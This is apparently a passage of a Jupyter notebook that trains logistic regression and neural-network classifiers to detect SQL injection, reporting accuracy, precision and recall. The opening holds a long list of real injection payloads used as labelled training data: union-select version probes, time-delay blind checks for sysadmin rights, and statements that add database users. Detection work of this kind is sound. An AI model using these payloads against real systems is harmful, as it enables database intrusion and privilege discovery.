 "insert into mysql.user  ( user, host, password )  values  ( 'name', 'localhost', password ( 'pass123'  )  )  ",
 'grant connect to name; grant resource to name;',
 'insert into users ( login, password, level )  values (  char ( 0x70 )  + char ( 0x65 )  + char ( 0x74 )  + char ( 0x65 )  + char ( 0x72 )  + char ( 0x70 )  + char ( 0x65 )  + char ( 0x74 )  + char ( 0x65 )  + char ( 0x72 ) ,char ( 0x64 ) ',
 "' or numeric= numeric--",
 "' union  ( select @@version )  --",
 "' union  ( select NULL,  ( select @@version  )  )   --",
 "' union  ( select NULL, NULL,  ( select @@version  )  )   --",
 "' union  ( select NULL, NULL, NULL,   ( select @@version  )  )   --",
 "' union  ( select NULL, NULL, NULL, NULL,   ( select @@version  )  )   --",
 "' union  ( select NULL, NULL, NULL, NULL,  NULL,  ( select @@version  )  )   --",
 "'; if not ( substring  (  (  select @@version ) ,25,numeric)  <> 0 )  waitfor delay '0:0:2' --",
 "'; if not ( substring  (  (  select @@version ) ,25,numeric)  <> numeric )  waitfor delay '0:0:2' --",
 "'; if not ( substring  (  (  select @@version ) ,25,numeric)  <> numeric )  waitfor delay '0:0:2' --",
 "'; if not ( substring  (  (  select @@version ) ,24,numeric)  <> numeric)  waitfor delay '0:0:2' --",
 "'; if not ( select system_user )  <> 'sa' waitfor delay '0:0:2' --",
 "'; if is_srvrolemember ( 'sysadmin' )  > 0 waitfor delay '0:0:2' -- ",
 "'; if not  (  (  select serverproperty ( 'isintegratedsecurityonly'  )  )   <> numeric)  waitfor delay '0:0:2' --",
 "'; if not  (  (  select serverproperty ( 'isintegratedsecurityonly'  )  )   <> 0 )  waitfor delay '0:0:2' --",
 ' select * from users where id = numericor  ( \\ )  = numericunion select numeric,@@VERSION --numeric',
 ' select * from users where id = numericor  ( \\. )  = numericunion select numeric,@@VERSION --numeric',
 ' select * from users where id = numericor  ( \\+ )  = numericor numeric= numeric--numeric',
 ' select * from users where id = numericor  ( numeric)  = numericunion select numeric,banner from v$version where rownum = numeric--numeric',
 ' select * from users where id = numericor  ( \\+ )  = numericunion select numeric,@@VERSION --numeric',
 ' select * from users where id = numericor  ( $+ )  = numericor numeric= numeric--numeric',
 ' select * from users where id = numericor  ( $+ )  = numericunion select numeric,@@VERSION --numeric',
 ' select * from users where id = numericor \\.<\\ or numeric= numeric--numeric',
 ' select * from users where id = numericor \\.<numericor numeric= numeric--numeric',
 ' select * from users where id = numericor \\.<numericunion select numeric,@@VERSION --numeric',
 ' select * from users where id = numericor \\.<\\ union select numeric,@@VERSION --numeric',
 ' select * from users where id = numericor \\.<$ or numeric= numeric--numeric',
 ' select * from users where id = numericor \\.<$ union select numeric,@@VERSION --numeric',
 ' select * from users where id = numericor \\.<  = numericunion select numeric,@@VERSION --numeric',
 ' select * from users where id = numeric||numericunion select numeric,banner from v$version where rownum = numeric--numeric',
 ' select * from users where id = numeric||numericunion select null,banner from v$version where rownum = numeric--numeric',
 ' select * from users where id = numeric  or numeric= numeric--numeric',
 ' select * from users where id = numericor \\+<\\ or numeric= numeric--numeric',
 ' select * from users where id = numericor numeric<@ = numericunion select numeric,version (  )  --numeric',
 ' select * from users where id = numericor \\+<\\ union select numeric,@@VERSION --numeric',
 ' select * from users where id = numericor \\+<$ union select numeric,@@VERSION --numeric',
 ' select * from users where id = numericornumeric&@# = numericunion select numeric,version (  )  --numeric',
 ' select * from users where id = numericor $ . = numericunion select numeric,@@VERSION --numeric',
 ' select * from users where id = numericor $ numeric= numericor numeric= numeric--numeric',
 ' select * from users where id = numericor $ numeric= numericunion select numeric,@@VERSION --numeric',
 ' select * from users where id = numericor $<\\ or numeric= numeric--numeric',
 ' select * from users where id = numericor $<\\. or numeric= numeric--numeric',
 ' select * from users where id = numericor $<\\. union select numeric,@@VERSION --numeric',
 ' select * from users where id = numericor $<\\ union select numeric,@@VERSION --numeric',
 ' select * from users where id = numericor $+<\\ or numeric= numeric--numeric',
 ' select * from users where id = numericor $+<numericunion select numeric,@@VERSION --numeric',
 ' select * from users where id = numericor $+<\\ union select numeric,@@VERSION --numeric',
 ' select * from users where id = numericor $+<$ union select numeric,@@VERSION --numeric',
 ' select * from users where id = numericor \\<\\. or numeric= numeric--numeric',
 ' select * from users where id = numericor \\<\\. union select numeric,@@VERSION --numeric',
 ' select * from users where id = numericor \\<numericor numeric= numeric--numeric',
 ' select * from users where id = numericor \\<numericunion select numeric,@@VERSION --numeric',
 ' select * from users where id = numericor \\<\\ union select numeric,@@VERSION --numeric',
 ' select * from users where id = numericor \\<\\ union select null,@@VERSION --numeric',
 ' select * from users where id = numericor \\<$ or numeric= numeric--numeric',
 ' select * from users where id = numericor \\<$ union select numeric,@@VERSION --numeric',
 ' select * from users where id = numericor \\<  = numericor numeric= numeric--numeric',
 ' select * from users where id = numericor \\<  = numericunion select numeric,@@VERSION --numeric',
 ' select * from users where id = numericor !<@ or numeric= numeric--numeric',
 ' select * from users where id = numericor !<@ union select numeric,version (  )  --numeric',
 ' select * from users where id = numericor @`\\` union select numeric,version (  )  --numeric',
 ' select * from users where id = numericor  @$# = numericunion select numeric,version (  )  --numeric',
 ' select * from users where id = numericor @<@ = numericunion select numeric,version (  )  --numeric',
 ' select * from users where id = numeric+ ( \\ )  or numeric= numeric--numeric',

#### Combination of benign an attack data

In [110]:
import pandas as pd

In [111]:
values=[]
for i in all_sqli_sentence:
    values.append((i,1))

In [112]:
for i in data:
    values.append((i,0))

In [113]:
df=pd.DataFrame(values,columns=['Sentence','Label'])

In [114]:
len(values)

4200

In [115]:
values[1]

("a' ", 1)

In [116]:
len(all_sqli_sentence)+len(data)

4200

In [117]:
df.head()

                    Sentence  Label
0                          a      1
1                        a'       1
2                      a' --      1
3  a' or numeric=numeric; --      1
4                          @      1

### Save data as csv

In [57]:
df.to_csv('sqli.csv', index=False, encoding='utf-16')

In [58]:
df=pd.read_csv('sqli.csv',encoding='utf-16')

In [118]:


from sklearn.feature_extraction.text import CountVectorizer
vectorizer = CountVectorizer( min_df=2, max_df=0.7, stop_words=stopwords.words('english'))
posts = vectorizer.fit_transform(df['Sentence'].values.astype('U')).toarray()

In [119]:
posts.shape

(4200, 4726)

In [120]:
transformed_posts=pd.DataFrame(posts)

In [121]:
df=pd.concat([df,transformed_posts],axis=1)

In [122]:
X=df[df.columns[2:]]

In [123]:
y=df['Label']

In [124]:
from sklearn.model_selection import train_test_split

In [125]:
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)

In [126]:
X.shape

(4200, 4726)

In [127]:
from sklearn.linear_model import LogisticRegression
clf = LogisticRegression(random_state=0).fit(X_train, y_train)

In [128]:
from sklearn.metrics import accuracy_score

In [129]:
y_pred=clf.predict(X_test)

In [130]:
accuracy_score(y_test, y_pred)

0.9380952380952381

In [ ]:
for i,j in zip(y_test,y_pred):
    print(i==j)

In [131]:
from keras.models import Sequential
from keras import layers
from keras.preprocessing.text import Tokenizer
from keras.wrappers.scikit_learn import KerasClassifier

In [132]:
input_dim = X_train.shape[1]  # Number of features

model = Sequential()
model.add(layers.Dense(20, input_dim=input_dim, activation='relu'))
model.add(layers.Dense(10,  activation='tanh'))
# model.add(layers.Flatten())
model.add(layers.Dense(1024, activation='relu'))

model.add(layers.BatchNormalization())
model.add(layers.Dropout(0.5))
model.add(layers.Dense(1, activation='sigmoid'))
# model.add(Activation('softmax'))

In [133]:
model.compile(loss='binary_crossentropy', 
              optimizer='adam', 
              metrics=['accuracy'])
model.summary()

Model: "sequential_2"
_________________________________________________________________
Layer (type)                 Output Shape              Param #
=================================================================
dense_5 (Dense)              (None, 20)                94540
_________________________________________________________________
dense_6 (Dense)              (None, 10)                210
_________________________________________________________________
dense_7 (Dense)              (None, 1024)              11264
_________________________________________________________________
batch_normalization_2 (Batch (None, 1024)              4096
_________________________________________________________________
dropout_2 (Dropout)          (None, 1024)              0
_________________________________________________________________
dense_8 (Dense)              (None, 1)                 1025
=================================================================
Total params: 111,135
Trainable params: 109,087
Non-trainable params: 2,048
_________________________________________________________________

In [134]:
classifier_nn = model.fit(X_train,y_train,
                    epochs=10,
                    verbose=True,
                    validation_data=(X_test, y_test),
                    batch_size=15)

Train on 3360 samples, validate on 840 samples
Epoch 1/10
3360/3360 [==============================] - 4s 1ms/step - loss: 0.2045 - accuracy: 0.9089 - val_loss: 0.6578 - val_accuracy: 0.7000
Epoch 2/10
3360/3360 [==============================] - 2s 491us/step - loss: 0.1132 - accuracy: 0.9518 - val_loss: 0.4907 - val_accuracy: 0.7107
Epoch 3/10
3360/3360 [==============================] - 2s 486us/step - loss: 0.0988 - accuracy: 0.9592 - val_loss: 0.0796 - val_accuracy: 0.9690
Epoch 4/10
3360/3360 [==============================] - 2s 499us/step - loss: 0.0752 - accuracy: 0.9693 - val_loss: 0.0649 - val_accuracy: 0.9714
Epoch 5/10
3360/3360 [==============================] - 2s 519us/step - loss: 0.0802 - accuracy: 0.9696 - val_loss: 0.0635 - val_accuracy: 0.9702
Epoch 6/10
3360/3360 [==============================] - 2s 543us/step - loss: 0.0828 - accuracy: 0.9667 - val_loss: 0.0690 - val_accuracy: 0.9702
Epoch 7/10
3360/3360 [==============================] - 2s 492us/step - loss: 0.0767 - accuracy: 0.9693 - val_loss: 0.0747 - val_accuracy: 0.9690
Epoch 8/10
3360/3360 [==============================] - 2s 504us/step - loss: 0.0628 - accuracy: 0.9747 - val_loss: 0.0601 - val_accuracy: 0.9702
Epoch 9/10
3360/3360 [==============================] - 2s 522us/step - loss: 0.0729 - accuracy: 0.9702 - val_loss: 0.0610 - val_accuracy: 0.9714
Epoch 10/10
3360/3360 [==============================] - 2s 509us/step - loss: 0.0721 - accuracy: 0.9696 - val_loss: 0.0731 - val_accuracy: 0.9702

In [135]:
pred=model.predict(X_test)

In [136]:
for i in range(len(pred)):
    if pred[i]>0.5:
        pred[i]=1
    elif pred[i]<=0.5:
        pred[i]=0

In [137]:
accuracy_score(y_test,pred)

0.9702380952380952

In [ ]:
for i,j in zip(y_test,pred):
    print(i==j)

### Confusion Matrix
#### Assumption:
1. SQLI attack type is positive

In [138]:
def accuracy_function(tp,tn,fp,fn):
    
    accuracy = (tp+tn) / (tp+tn+fp+fn)
    
    return accuracy

In [139]:
def precision_function(tp,fp):
    
    precision = tp / (tp+fp)
    
    return precision

In [140]:
def recall_function(tp,fn):
    
    recall=tp / (tp+fn)
    
    return recall

In [141]:
def confusion_matrix(truth,predicted):
    
    true_positive = 0
    true_negative = 0
    false_positive = 0
    false_negative = 0
    
    for true,pred in zip(truth,predicted):
        if true == 1:
            if pred == true:
                true_positive += 1
            elif pred != true:
                false_negative += 1

        elif true == 0:
            if pred == true:
                true_negative += 1
            elif pred != true:
                false_positive += 1
            
    accuracy=accuracy_function(true_positive, true_negative, false_positive, false_negative)
    precision=precision_function(true_positive, false_positive)
    recall=recall_function(true_positive, false_negative)
    
    return (accuracy,
            precision,
           recall)

In [142]:
accuracy,precision,recall=confusion_matrix(y_test,pred)

In [143]:
print(" Accuracy : {0} \n Precision : {1} \n Recall : {2}".format(accuracy, precision, recall))

 Accuracy : 0.9702380952380952
 Precision : 0.9157509157509157
 Recall : 0.9920634920634921

In [144]:

from sklearn.metrics import precision_score
precision_score(y_test, pred)

0.9157509157509157

In [145]:
from sklearn.metrics import recall_score
recall_score(y_test, pred)

0.9920634920634921